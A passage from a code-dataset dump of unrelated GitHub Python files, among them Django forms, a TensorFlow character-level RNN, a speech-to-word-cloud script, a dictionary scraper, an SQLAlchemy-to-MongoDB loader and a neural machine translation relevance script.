\"Google\"} ]\n }\n\n response = client.simulate_get('/', params=params)\n\n assert response.content == json.dumps(doc)\n assert response.status == falcon.HTTP_OK\n\n","repo_name":"VolodymyrSlav/Hipchat_task","sub_path":"hipchat/tests/test_links.py","file_name":"test_links.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25846437639","text":"from django import forms\nfrom .models import Product\n\n\nclass ProductForm(forms.ModelForm):\n class Meta:\n model = Product\n fields = ('art', 'model', 'color', 'size', 'structure', 'shipment', 'count', 'seller', 'date_name')\n\n\nclass Filter(forms.Form):\n filter_seller = forms.ChoiceField(choices=(\n ('GUM', 'GUM'),\n ('SLAVUTINY', 'SLAVUTINY'),\n ('SALON', 'SALON')\n ))\n\n\nclass FilterDate(forms.Form):\n filter_date = forms.ChoiceField(choices=(\n ('WEEK', 'WEEK'),\n ('MONTH', 'MONTH'),\n ))\n","repo_name":"Jendobas/accounting_table","sub_path":"tab/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29273750421","text":"from sys import stdin, stdout\nimport sys\nsys.setrecursionlimit(10000)\nmemo = [0] * 5010\n\ndef fib(n):\n if n == 0: return 0\n if n == 1: return 1\n if memo[n]: return memo[n]\n memo[n] = fib(n-1) + fib(n-2)\n return memo[n]\n\nfor line in stdin:\n n = int(line)\n stdout.write(\"The Fibonacci number for {} is {}\\n\".format(n, 
fib(n)))\n","repo_name":"Edmond-Mo/online_judge","sub_path":"UVa/UVa00495_fibonacci_freeze.py","file_name":"UVa00495_fibonacci_freeze.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
{"seq_id":"10534801714","text":"import sys\n\ninput = sys.stdin.readline\nsys.setrecursionlimit(10**6)\n\ndef dfs(depth):\n    if depth == n:\n        print(*ans)\n        return\n    \n    for i in range(n):\n        if not mark[i]:\n            mark[i] = True\n            ans.append(data[i])\n            dfs(depth+1)\n            ans.pop()\n            mark[i] = False\n\n\nif __name__ == \"__main__\":\n    n = int(input())\n    data = [i + 1 for i in range(n)]\n    mark = [False] * n\n\n    ans = []\n    dfs(0)","repo_name":"tsinghua-auto4/ct_note","sub_path":"BOJ/2301/12/김동현_10974_모든 순열.py","file_name":"김동현_10974_모든 순열.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"}
{"seq_id":"72233536999","text":"import matplotlib as mpl\nimport os\nimport re\nfrom os.path import join, dirname\nfrom dotenv import load_dotenv\nfrom google.cloud import speech_v1p1beta1 as speech\nfrom google.cloud import translate_v2 as translate\nfrom wordcloud import WordCloud\nimport matplotlib.pyplot as plt\nfrom janome.tokenizer import Tokenizer\n\n# Set the path to the credentials file in an environment variable\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"credentials.json\"\nmpl.rcParams['font.family'] = 'Noto Sans JP'\n\n\ndef transcribe_audio():\n    client = speech.SpeechClient()\n\n\n    # audio = speech.RecognitionAudio(content=content)\n    uri = os.environ.get(\"AUDIO_URI\")\n    audio = speech.RecognitionAudio(uri=uri)\n\n    config = speech.RecognitionConfig(\n        encoding=speech.RecognitionConfig.AudioEncoding.LINEAR16,\n        sample_rate_hertz=48000,\n        language_code=\"es-ES\",\n    )\n\n    operation = client.long_running_recognize(config=config, audio=audio)\n    print(\"Waiting for operation to complete...\")\n    response = operation.result(timeout=90)\n\n    transcript = \"\"\n    for result in response.results:\n        transcript += result.alternatives[0].transcript\n\n    return transcript\n\n\ndef translate_text(text):\n    translate_client = translate.Client()\n\n    result = translate_client.translate(text, target_language='ja')\n\n    return result['translatedText']\n\n\ndef extract_words(text, exclusion=[]):\n    token = Tokenizer().tokenize(text)\n    words = []\n\n    for line in token:\n        tkn = re.split('\\t|,', str(line))\n        if (tkn[1] in ['名詞'] and tkn[2] in ['一般', '固有名詞']) or (tkn[1] in ['動詞', '形容詞']):\n            words.append(tkn[7])\n\n    return ' '.
join(words)\n\n\ndef create_word_cloud(words, output_file):\n font_path = os.path.abspath(\"NotoSansJP-VariableFont_wght.ttf\")\n\n wordcloud = WordCloud(background_color='white',\n font_path=font_path, width=2000, height=1500, prefer_horizontal=1, margin=10).generate(words)\n plt.figure(figsize=(8, 8), facecolor=None)\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.tight_layout(pad=0)\n\n plt.savefig(output_file)\n\n\ndef main():\n dotenv_path = join(dirname(__file__), '.env')\n load_dotenv(dotenv_path)\n\n transcribed_text = transcribe_audio()\n print(transcribed_text)\n\n with open('transcribed_text_es.txt', 'w') as f:\n f.write(transcribed_text)\n\n print(\"Translating text...\")\n translated_text = translate_text(transcribed_text)\n with open('translated_text_ja.txt', 'w') as f:\n f.write(translated_text)\n\n words = extract_words(translated_text)\n\n print(\"Creating word cloud...\")\n create_word_cloud(words, 'word_cloud.png')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kurikin/spanish-text-mining","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36501896171","text":"import tkFont\r\nfrom Tkinter import *\r\nimport Tkinter as tk\r\nfrom threading import Thread, current_thread\r\nimport time\r\n\r\nclass Chronometre(Thread):\r\n\tdef __init__(self, node, g, t, score):\r\n\t\tThread.__init__(self)\r\n\t\tself.node= node\r\n\t\tself.t= 0\r\n\t\tself.state= False\r\n\t\tself.g= g\r\n\t\tself.daemon= True\r\n\t\tself.f1= tkFont.Font(family=\"Helvetica Neue\",size=30,weight=\"normal\")\r\n\t\tself.f2= tkFont.Font(family=\"Helvetica Neue\",size=15,weight=\"normal\")\r\n\t\tself.scoreText= Label(self.node,text=\"cc\")\r\n\t\tself.timeText= Label(self.node, text=\"zef\")\r\n\t\t\r\n\t\tself.scoreText.place(x=275, y=20)\r\n\t\tself.timeText.place(x=600, y=20)\r\n\r\n\tdef paint(self):\r\n\t\tself.scoreText.configure(text=\"Score: \"+str(self.g.getScore()))\r\n\t\tself.timeText.configure(text=\"Temps: \"+str(self.t)+\"s\")\r\n\r\n\t\tself.scoreText.place(x=275, y=20)\r\n\t\tself.timeText.place(x=600, y=20)\r\n\tdef run(self):\r\n\t\ti= 1\r\n\t\twhile True:\r\n\t\t\tif self.g.getState():\r\n\t\t\t\tif(i == 0):\r\n\t\t\t\t\tself.t+= 1\r\n\t\t\t\ttime.sleep(.01)\r\n\t\t\t\ti= (i+1)%99\r\n\t\t\t\tself.g.paint()\r\n","repo_name":"mehdibouchet/ex3_2_python","sub_path":"Chronometre.py","file_name":"Chronometre.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36345472668","text":"# encoding:utf-8\nfrom __future__ import unicode_literals\n\nfrom re import IGNORECASE\n\nimport pyparsing as pp\n\nfrom gr_devices import devices\nfrom gr_attributes import attributes, var_smartphone_attributes, attribute_value_spec\n\nyes_no = pp.Group(pp.Or([\n pp.oneOf(['ja', 'jo', 'jupp', 'OK'], caseless=True)('yes_no:yes'),\n pp.oneOf(['nein', 'nee', 'nö'], caseless=True)('yes_no:no')\n])).setResultsName('yes_no')\n\ndevices_and_attributes = pp.Or([\n pp.Group(\n attributes + pp.Or([\"des\", \"vom\", \"beim\"]) + devices\n ).setResultsName('get_attribute'),\n pp.Group(\n pp.Regex('Hat (das|der|die)', IGNORECASE) + devices + pp.Regex('eine?n?') + attributes\n ).setResultsName('get_attribute'),\n pp.Group(\n pp.Regex('Ist (das|der|die)', IGNORECASE) + devices + attributes\n ).setResultsName('get_attribute'),\n pp.Group(\n pp.oneOf([\"Mit\", \"In\"], 
caseless=True) + \"welchen\" + attributes + \"gibt es das\" + devices\n ).setResultsName('get_options'),\n pp.Group(\n devices + pp.oneOf([\"mit\", \"in\", \"von\"]) + attribute_value_spec\n ).setResultsName('get_entities')\n])\n\nmain = pp.Or([\n pp.SkipTo(devices_and_attributes) + devices_and_attributes,\n yes_no\n])\n\n\n\nif __name__ == '__main__':\n main.parseString(\"In welchen Speichergrößen gibt es das iPhone7\")\n main.parseString(\"Arbeitsspeicher des Sony XperiaXZ Premium\")\n main.parseString(\"iPhone 7 mit mehr als 16 GB Arbeitsspeicher\")\n main.parseString(\"iPhone 7 mit Fingerabdrucksensor\")\n main.parseString(\"iPhone 7 mit mehr als 100 GB Speichergröße\")\n main.parseString(\"WLAN-Standards des Speedport W 921V\")\n main.parseString(\"Hat das Speedport W 921V eine integrierte DECT-Basis\")\n main.parseString(\"Anzahl Ethernet-Anschlüsse des Speedport W 921 V\")\n main.parseString(\"iPhone7 mit mehr als 2 Anzahl Ethernet-Anschlüsse\")\n main.parseString(\"Ist das Speedport W 921V VDSL-kompatibel\")\n","repo_name":"KlausEngelbrecht/HackathonNLU","sub_path":"gr_main.py","file_name":"gr_main.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24568746912","text":"\"\"\"\nVanilla Char-RNN using TensorFlow by Vinh Khuc (@knvinh).\nAdapted from Karpathy's min-char-rnn.py\nhttps://gist.github.com/karpathy/d4dee566867f8291f086\nRequires tensorflow>=1.0\nBSD License\n\nOriginal code from: Vinh Khuc (@knvinh)\nModified by: Marianne Linhares (@mari-linhares)\n\"\"\"\n\nimport numpy as np\nimport tensorflow as tf\n\n\n# helper functions\ndef one_hot(v):\n return np.eye(VOCAB_SIZE)[v]\n\n# data I/O\n\n# should be simple plain text file\ndata = open('data/about_tensorflow.txt', 'r').read()\nchars = list(set(data))\n\nDATA_SIZE, VOCAB_SIZE = len(data), len(chars)\nprint('data has %d characters, %d unique.' 
% (DATA_SIZE, VOCAB_SIZE))\n\nchar_to_ix = {ch: i for i, ch in enumerate(chars)}\nix_to_char = {i: ch for i, ch in enumerate(chars)}\n\n# hyperparameters\nHIDDEN_SIZE = 100  # hidden layer's size\nSEQ_LENGTH = 25  # number of steps to unroll\nLEARNING_RATE = 1e-1  # size of step for Gradient Descent\n\n# TensorFlow graph definition\n\n# Placeholders\ninputs = tf.placeholder(shape=[None, VOCAB_SIZE], dtype=tf.float32,\n                        name='inputs')\ntargets = tf.placeholder(shape=[None, VOCAB_SIZE], dtype=tf.float32,\n                         name='targets')\ninit_state = tf.placeholder(shape=[1, HIDDEN_SIZE], dtype=tf.float32,\n                            name='state')\n\n# Random initializer will be used by all variables\ninitializer = tf.random_normal_initializer(stddev=0.01)\n\n\n# Initialize the RNN\ndef get_RNN_variables(reuse):\n    with tf.variable_scope('RNN', reuse=reuse):\n        # hidden layer\n        Wxh = tf.get_variable('Wxh', [VOCAB_SIZE, HIDDEN_SIZE],\n                              initializer=initializer)\n        Whh = tf.get_variable('Whh', [HIDDEN_SIZE, HIDDEN_SIZE],\n                              initializer=initializer)\n        bh = tf.get_variable('bh', [HIDDEN_SIZE],\n                             initializer=initializer)\n\n        # output layer\n        Why = tf.get_variable('Why', [HIDDEN_SIZE, VOCAB_SIZE],\n                              initializer=initializer)\n        by = tf.get_variable('by', [VOCAB_SIZE],\n                             initializer=initializer)\n\n    return Wxh, Whh, bh, Why, by\n\n# Train the rnn\n\n# defining the initial state of the RNN\nhs_t = init_state\n\n# initialize RNN variables\nget_RNN_variables(reuse=False)\n\n# getting RNN variables\nWxh, Whh, bh, Why, by = get_RNN_variables(reuse=True)\n\n# Keep track of all outputs\nys = []\nfor t, xs_t in enumerate(tf.split(inputs, SEQ_LENGTH, axis=0)):\n    # hidden layer output\n    hs_t = tf.tanh(tf.matmul(xs_t, Wxh) + tf.matmul(hs_t, Whh) + bh)\n\n    # final output\n    ys_t = tf.matmul(hs_t, Why) + by\n    ys.append(ys_t)\n\n# Saves last hidden state\nhprev = hs_t\n# Concat outputs\noutputs = tf.concat(ys, axis=0)\n# Loss\nloss = tf.reduce_sum(tf.nn.softmax_cross_entropy_with_logits(labels=targets,\n                                                             logits=outputs))\n\n# Minimizer\nminimizer = tf.train.AdagradOptimizer(learning_rate=LEARNING_RATE,\n                                      use_locking=True)\n# Here's where the magic happens: compute gradients of the loss w.r.t. every trainable variable\ngrads_and_vars = minimizer.compute_gradients(loss)\n\n# Gradient clipping\ngrad_clipping = tf.constant(5.0, name='grad_clipping')\nclipped_grads_and_vars = []\nfor grad, var in grads_and_vars:\n    clipped_grad = tf.clip_by_value(grad, -grad_clipping, grad_clipping)\n    clipped_grads_and_vars.append((clipped_grad, var))\n\n# Gradient updates\n# more magic: apply the clipped gradients to update the weights\nupdates = minimizer.apply_gradients(clipped_grads_and_vars)\n\n# Sampling\nWxh, Whh, bh, Why, by = get_RNN_variables(reuse=True)\nh_sample = tf.tanh(tf.matmul(inputs, Wxh) + tf.matmul(init_state, Whh) + bh)\ny_sample = tf.matmul(h_sample, Why) + by\npred_sample = tf.nn.softmax(y_sample)\n\n# Create session and initialize variables\nsess = tf.Session()\ninit = tf.global_variables_initializer()\nsess.run(init)\n\n# Training\n\n# n: counts the number of steps, p: pointer to position in sequence\nn, p = 0, 0\n\n# this var will be used for sampling\nhprev_val = np.zeros([1, HIDDEN_SIZE])\n\n# loss at iteration 0\nsmooth_loss = -np.log(1.0 / VOCAB_SIZE) * SEQ_LENGTH\n\nwhile True:\n\n    # prepare inputs (we're sweeping from left to right in steps SEQ_LENGTH long)\n    if p + SEQ_LENGTH + 1 >= len(data) or n == 0:\n        hprev_val = np.zeros([1, HIDDEN_SIZE])  # reset RNN memory\n        p = 0  # go from start of data\n\n    
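# targets are the inputs shifted one character ahead (next-character prediction)\n    input_vals = [char_to_ix[ch] for ch in data[p:p + SEQ_LENGTH]]\n    target_vals = [char_to_ix[ch] for ch in data[p + 1:p + SEQ_LENGTH + 1]]\n\n    input_vals_onehot = 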
one_hot(input_vals)\n target_vals_onehot = one_hot(target_vals)\n\n # sampling\n if n % 1000 == 0:\n sample_length = 200\n hprev_sample = np.copy(hprev_val)\n\n # start from the first letter from the input\n x = np.zeros((VOCAB_SIZE, 1))\n x[input_vals[0]] = 1\n\n # stores predictions\n sample_ix = []\n for t in range(sample_length):\n # reshaping so it has the same shape as TensorFlow input\n x = np.reshape(x, [-1, VOCAB_SIZE])\n\n pred, hprev_sample = sess.run([pred_sample, h_sample],\n feed_dict={inputs: x,\n init_state: hprev_sample})\n # generates next letter\n ix = np.random.choice(range(VOCAB_SIZE), p=pred.ravel())\n # update next char with the prediction\n x = np.zeros((VOCAB_SIZE, 1))\n x[ix] = 1\n sample_ix.append(ix)\n\n txt = ''.join(ix_to_char[ix] for ix in sample_ix)\n print('----\\n%s\\n----' % (txt))\n\n # training\n hprev_val, loss_val, _ = sess.run([hprev, loss, updates],\n feed_dict={inputs: input_vals_onehot,\n targets: target_vals_onehot,\n init_state: hprev_val})\n\n # print progress\n smooth_loss = smooth_loss * 0.999 + loss_val * 0.001\n if n % 100 == 0:\n print('iter %d, loss: %f' % (n, smooth_loss))\n\n p += SEQ_LENGTH\n n += 1\n","repo_name":"modi975/tensorflow-workshop","sub_path":"code_samples/RNN/min_char_rnn/tensorflow_min_char_rnn.py","file_name":"tensorflow_min_char_rnn.py","file_ext":"py","file_size_in_byte":5805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34231936978","text":"# Import required functions\nfrom setuptools import setup, find_packages\n\n# read the contents of your README file\nfrom pathlib import Path\nthis_directory = Path(__file__).parent\nlong_description = (this_directory / \"README.md\").read_text()\n\n# Call setup function\nsetup(\n author=\"Javad Ebadi, Vahid Hoseinzade\",\n author_email=\"javad.ebadi.1990@gmail.com, vahid.hoseinzade64@gmail.com\",\n description=\"A simple python wrapper for inspirehep API\",\n name=\"pyinspirehep\",\n packages=find_packages(include=[\"pyinspirehep\", \"pyinspirehep.*\"]),\n version=\"1.1.1\",\n install_requires=['requests'],\n python_requires='>=3.7',\n license='MIT',\n url='https://github.com/javadebadi/pyinspirehep',\n long_description=long_description,\n long_description_content_type='text/markdown'\n)\n","repo_name":"javadebadi/pyinspirehep","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"75393946919","text":"from setuptools import setup, find_packages\n\n\nVERSION = \"0.3.0\"\n\nsetup(\n name='pulumi_ipwt_gcp',\n version=VERSION,\n description=\"Pulumi dynamic provider package for GCP by IPWT.PL\",\n url='https://github.com/mszewczyk-ipwt/pulumi-ipwt-gcp',\n project_urls={\n 'Repository': 'https://github.com/mszewczyk-ipwt/pulumi-ipwt-gcp'\n },\n packages=find_packages(),\n license='Apache-2.0',\n install_requires=[\n 'pulumi',\n 'google-auth',\n ],\n zip_safe=False\n)\n","repo_name":"mszewczyk-ipwt/pulumi-ipwt-gcp","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6323195146","text":"\n\ndef get_eg(word):\n import requests\n\n url = f'https://www.dictionary.com/browse/{word}'\n response = requests.get(url)\n\n html = response.text\n\n from bs4 import BeautifulSoup\n\n soup = BeautifulSoup(html, 'html.parser')\n\n sort = soup.find(id= 
\"examples-section\")\n egs = sort.find_all(class_=\"one-click-content css-b5q2lz e15kc6du2\")\n \n result = [] \n ran = len(egs) \n if len(egs) >5:\n ran =5\n for i in range(ran):\n result.append( f\"{i+1}. \"+egs[i].text)\n \n result = '
    '.join(result)\n return result \n \n\n\n\ndef search_word(word):\n \n import requests\n\n url = f'https://www.dictionary.com/browse/{word}'\n response = requests.get(url)\n\n html = response.text\n\n from bs4 import BeautifulSoup\n\n soup = BeautifulSoup(html, 'html.parser')\n\n sort = soup.find(class_= \"css-1avshm7 e16867sm0\")\n area = sort.find_all(class_=\"one-click-content css-nnyc96 e1q3nk1v1\" ) \n\n result = []\n for i in range(len(area)):\n mod = area[i].text.replace(':','/ eg:')\n result.append(f'{i+1}. '+mod) \n \n result = '
    '.join(result)\n return result \n\n\n\n\ndef get_back(word):\n \n defin = search_word(word)\n eg = get_eg(word)\n \n ret = defin +'

    '+'Examples:'+'

    '+eg\n \n return ret \n\n\ndef create_vocab(word_list):\n import tqdm\n import time\n\n global box\n #global name\n #global back\n name = []\n back = []\n box = pd.DataFrame()\n for i in tqdm.tqdm_notebook(range(len(word_list))):\n try:\n back.append( get_back( word_list[i] ))\n name.append(word_list[i])\n except AttributeError as e:\n print(e)\n\n\n box['word'] = name\n box['back'] = back\n box.set_index('word' , inplace =True )\n\n return box","repo_name":"rogJohn01/Vocab_crawler-FC-","sub_path":"Vocab_crawler.py","file_name":"Vocab_crawler.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22050734749","text":"import pprint\n\nimport pymongo as pymongo\nfrom sqlalchemy import inspect, select\nfrom sqlalchemy.orm import Session\nimport instances_sqlAlchemy\n\n\nif __name__ == '__main__':\n Base = instances_sqlAlchemy.Base\n engine = instances_sqlAlchemy.engine\n Cliente = instances_sqlAlchemy.Cliente\n Conta = instances_sqlAlchemy.Conta\n\n Base.metadata.create_all(engine)\n inspector_engine = inspect(engine)\n print(inspector_engine.get_table_names())\n\n with Session(engine) as session:\n andre = Cliente(\n name='André',\n cpf='153478965',\n endereco='rua 2, casa 33',\n conta=[Conta(tipo='corrente',\n agencia=1,\n saldo=1000.0,\n num=756471)]\n )\n\n pedro = Cliente(\n name='Pedro',\n cpf='698478965',\n endereco='rua 5, casa 50',\n conta=[Conta(tipo='corrente',\n agencia=1,\n saldo=0,\n num=756741),\n Conta(tipo='poupanca',\n saldo=500.0,\n agencia=1,\n num=756881)]\n )\n\n joao = Cliente(\n name='José',\n cpf='153471585',\n endereco='rua 7, casa 1',\n )\n\n # Enviando para o Banco de dados (persistência de dados)\n session.add_all([andre, pedro, joao])\n\n session.commit()\n\n print('estabelecendo uma query para Clientes')\n stmt = select(Cliente)\n print(stmt)\n for cliente in session.scalars(stmt):\n print(cliente)\n\n print('estabelecendo uma query para Conta')\n stmt = select(Conta)\n print(stmt)\n for conta in session.scalars(stmt):\n print(conta)\n\n print('estabelecendo uma query para Conta')\n stmt_join = select(Cliente.name,\n Cliente.cpf,\n Cliente.endereco,\n Conta.tipo,\n Conta.agencia,\n Conta.num,\n Conta.saldo).join_from(Cliente, Conta)\n connection = engine.connect()\n results = connection.execute(stmt_join).fetchall()\n mongo_list = list()\n for result in results:\n dado_cliente = list(result)\n mongo_data= {\"nome\":dado_cliente[0],\n \"cpf\":dado_cliente[1],\n \"endereco\": dado_cliente[2],\n \"tipo\":dado_cliente[3],\n \"agencia\":dado_cliente[4],\n \"num\": dado_cliente[5],\n \"saldo\": dado_cliente[6]\n }\n mongo_list.append(mongo_data)\n\n\n\n client = pymongo.MongoClient(\n 'MongoDB-URI')\n db = client.banco\n clientes_contas = db.clientes_contas\n clientes_contas.insert_many(mongo_list)\n\n for cliente_conta in clientes_contas.find():\n pprint.pprint(cliente_conta)\n","repo_name":"andrejfg/Estudos_SQLAlchemy_pyMongo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14142844742","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport itertools\nimport os\nimport time\n\nimport numpy as np\nimport numpy\nimport tensorflow as tf\nimport thumt.data.record as record\nimport thumt.data.dataset as dataset\nimport 
thumt.data.vocab as vocabulary\nimport thumt.models as models\nimport thumt.utils.search as search\n\ndef normalize(matrix):\n matrix = numpy.abs(matrix)\n total = numpy.sum(matrix, -1)\n return matrix / numpy.expand_dims(total, -1) \n\ndef get_rlv_encoder_vector(w_x_newh, w_h_newh, enc_h, back=False):\n '''\n w_h_newh: [len_src, 1]\n w_x_newh: [len_src, 1]\n enc_h: [1, len_src, dim]\n '''\n len_src = w_x_newh.shape[0]\n r = numpy.zeros((len_src, len_src), dtype = 'float32') \n print(r.shape)\n R = numpy.zeros((len_src, len_src), dtype=\"float32\")\n for i in range(len_src):\n for j in range(i+1):\n if i == j:\n r[i,j] = w_x_newh[i][0]\n else:\n if i == 0:\n tmp = 0\n else:\n tmp = r[i-1,j]\n # relevance h_i, x_j\n r[i][j] = tmp * w_h_newh[i][0]\n if back:\n r = r[::-1, ::-1]\n for i in range(len_src): # hidden\n for j in range(len_src): # src\n R[i][j] = r[i][j] * numpy.sum(enc_h[0,i]) \n # print out \n R = normalize(R)\n print('encoder:', R)\n return r, R\n\ndef to_text(vocab, mapping, indice, params):\n print('idce', indice)\n decoded = []\n for idx in indice:\n if idx == mapping[params.eos]:\n break\n decoded.append(vocab[idx])\n\n decoded = \" \".join(decoded)\n return decoded\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=\"Translate using existing NMT models\",\n usage=\"translator.py [] [-h | --help]\"\n )\n\n # input files\n parser.add_argument(\"--input\", type=str, nargs=2, required=True,\n help=\"Path of input file\")\n parser.add_argument(\"--checkpoints\", type=str, nargs=\"+\", required=True,\n help=\"Path of trained models\")\n parser.add_argument(\"--vocabulary\", type=str, nargs=2, required=True,\n help=\"Path of source and target vocabulary\")\n\n # model and configuration\n parser.add_argument(\"--models\", type=str, required=True, nargs=\"+\",\n help=\"Name of the model\")\n parser.add_argument(\"--parameters\", type=str,\n help=\"Additional hyper parameters\")\n\n return parser.parse_args()\n\n\ndef default_parameters():\n params = tf.contrib.training.HParams(\n input=None,\n output=None,\n vocabulary=None,\n model=None,\n\n batch_size=1,\n max_length=25,\n length_multiplier=1,\n mantissa_bits=2,\n buffer_size=10000,\n constant_batch_size=True,\n # vocabulary specific\n pad=\"\",\n bos=\"\",\n eos=\"\",\n unk=\"\",\n mapping=None,\n append_eos=False,\n # decoding\n top_beams=1,\n beam_size=4,\n decode_alpha=0.6,\n decode_length=50,\n decode_batch_size=32,\n decode_constant=5.0,\n decode_normalize=False,\n device_list=[0],\n num_threads=6\n )\n\n return params\n\n\ndef merge_parameters(params1, params2):\n params = tf.contrib.training.HParams()\n\n for (k, v) in params1.values().iteritems():\n params.add_hparam(k, v)\n\n params_dict = params.values()\n\n for (k, v) in params2.values().iteritems():\n if k in params_dict:\n # Override\n setattr(params, k, v)\n else:\n params.add_hparam(k, v)\n\n return params\n\n\ndef import_params(model_dir, model_name, params):\n model_dir = os.path.abspath(model_dir)\n m_name = os.path.join(model_dir, model_name + \".json\")\n\n if not tf.gfile.Exists(m_name):\n return params\n\n with tf.gfile.Open(m_name) as fd:\n tf.logging.info(\"Restoring model parameters from %s\" % m_name)\n json_str = fd.readline()\n params.parse_json(json_str)\n\n return params\n\n\ndef override_parameters(params, args):\n if args.parameters:\n params.parse(args.parameters)\n\n params.vocabulary = {\n \"source\": vocabulary.load_vocabulary(args.vocabulary[0]),\n \"target\": vocabulary.load_vocabulary(args.vocabulary[1])\n }\n 
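# post-process both vocabularies; the control-symbol mappings below are built from them\n    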
params.vocabulary[\"source\"] = vocabulary.process_vocabulary(\n params.vocabulary[\"source\"], params\n )\n params.vocabulary[\"target\"] = vocabulary.process_vocabulary(\n params.vocabulary[\"target\"], params\n )\n\n control_symbols = [params.pad, params.bos, params.eos, params.unk]\n\n params.mapping = {\n \"source\": vocabulary.get_control_mapping(\n params.vocabulary[\"source\"],\n control_symbols\n ),\n \"target\": vocabulary.get_control_mapping(\n params.vocabulary[\"target\"],\n control_symbols\n )\n }\n\n return params\n\n\ndef session_config(params):\n optimizer_options = tf.OptimizerOptions(opt_level=tf.OptimizerOptions.L1,\n do_function_inlining=False)\n graph_options = tf.GraphOptions(optimizer_options=optimizer_options)\n config = tf.ConfigProto(allow_soft_placement=True,\n graph_options=graph_options)\n if params.device_list:\n device_str = \",\".join([str(i) for i in params.device_list])\n config.gpu_options.visible_device_list = device_str\n\n return config\n\n\ndef set_variables(var_list, value_dict, prefix):\n ops = []\n for var in var_list:\n for name in value_dict:\n var_name = \"/\".join([prefix] + list(name.split(\"/\")[1:]))\n\n if var.name[:-2] == var_name:\n tf.logging.info(\"restoring %s -> %s\" % (name, var.name))\n with tf.device(\"/cpu:0\"):\n op = tf.assign(var, value_dict[name])\n ops.append(op)\n break\n\n return ops\n\n\ndef main(args):\n tf.logging.set_verbosity(tf.logging.INFO)\n # Load configs\n model_cls_list = [models.get_model(model) for model in args.models]\n params_list = [default_parameters() for _ in range(len(model_cls_list))]\n params_list = [\n merge_parameters(params, model_cls.get_parameters())\n for params, model_cls in zip(params_list, model_cls_list)\n ]\n params_list = [\n import_params(args.checkpoints[i], args.models[i], params_list[i])\n for i in range(len(args.checkpoints))\n ]\n params_list = [\n override_parameters(params_list[i], args)\n for i in range(len(model_cls_list))\n ]\n\n # Build Graph\n with tf.Graph().as_default():\n model_var_lists = []\n\n # Load checkpoints\n for i, checkpoint in enumerate(args.checkpoints):\n print(\"Loading %s\" % checkpoint)\n var_list = tf.train.list_variables(checkpoint)\n values = {}\n reader = tf.train.load_checkpoint(checkpoint)\n\n for (name, shape) in var_list:\n if not name.startswith(model_cls_list[i].get_name()):\n continue\n\n if name.find(\"losses_avg\") >= 0:\n continue\n\n tensor = reader.get_tensor(name)\n values[name] = tensor\n\n model_var_lists.append(values)\n\n # Build models\n model_fns = []\n\n for i in range(len(args.checkpoints)):\n name = model_cls_list[i].get_name()\n model = model_cls_list[i](params_list[i], name + \"_%d\" % i)\n model_fn = model.get_relevance_func()\n model_fns.append(model_fn)\n\n params = params_list[0]\n # Build input queue\n features = dataset.get_training_input(args.input, params)\n relevances = model_fns[0](features, params)\n\n assign_ops = []\n\n all_var_list = tf.trainable_variables()\n\n for i in range(len(args.checkpoints)):\n un_init_var_list = []\n name = model_cls_list[i].get_name()\n\n for v in all_var_list:\n if v.name.startswith(name + \"_%d\" % i):\n un_init_var_list.append(v)\n\n ops = set_variables(un_init_var_list, model_var_lists[i],\n name + \"_%d\" % i)\n assign_ops.extend(ops)\n\n assign_op = tf.group(*assign_ops)\n\n sess_creator = tf.train.ChiefSessionCreator(\n config=session_config(params)\n )\n\n\n\n results = []\n num = 10\n count = 0\n hooks = [tf.train.LoggingTensorHook({}, every_n_iter=1)]\n with 
tf.train.MonitoredSession(session_creator=sess_creator, hooks=hooks) as sess:\n # Restore variables\n sess.run(assign_op)\n src_seq, trg_seq, rlv_info, loss = sess.run(relevances)\n start = time.time()\n while count < num:#not sess.should_stop():\n src_seq, trg_seq, rlv_info, loss = sess.run(relevances)\n print('--result--')\n print('loss:', loss)\n for i in range(src_seq.shape[0]):\n src = to_text(params.vocabulary[\"source\"], params.mapping[\"source\"], src_seq[i], params)\n trg = to_text(params.vocabulary[\"target\"], params.mapping[\"target\"], trg_seq[i], params)\n print('sentence %d' %i)\n print('src:', src)\n print('src_idx:', src_seq[i])\n print('trg:', trg)\n print('trg_idx:', trg_seq[i])\n print('result:',rlv_info[\"result\"][i])\n count += 1\n end = time.time()\n print('total time:',end-start)\n\nif __name__ == \"__main__\":\n 